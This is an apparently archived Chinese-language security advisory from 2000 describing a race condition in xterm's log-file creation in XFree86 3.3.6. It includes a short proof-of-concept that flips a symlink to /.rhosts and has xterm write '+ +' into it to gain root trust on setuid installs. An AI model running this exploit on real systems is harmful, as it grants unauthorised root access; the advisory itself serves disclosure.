发布日期：2000-03-03
更新日期：2000-03-07

受影响系统：

XFree86 3.3.6

描述：

---

来源：Morten Welinder <terra@DIKU.DK>

    当XTerm创建一个日志文件时，其创建方法会导致出现“竞争环境(race condition)”的情况：

1、检查该文件是否存在。
2、如果该文件不存在，则以当前用户真实uid/gid产生子进程并创建该文件。
3、检查该文件是否存在。
4、检查该文件是否可写。
5、以O_WRONLY | O_APPEND 权限打开该文件。（这里存在安全问题！）

    攻击者只要在第四步和第五步间创建符号链接文件，即可形成“竞争环境”。因此如果XTermp被setuid或setgid，则攻击者能够获取root权限。



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ls -lL `which xterm`
(If it's not setuid/setgid, you are safe)
$touch dummy
$symlink-flipflop link dummy /.rhosts
$xterm -l -lf link -e echo + +



建议：

---

暂无

浏览次数：6347
严重程度：0（网友投票）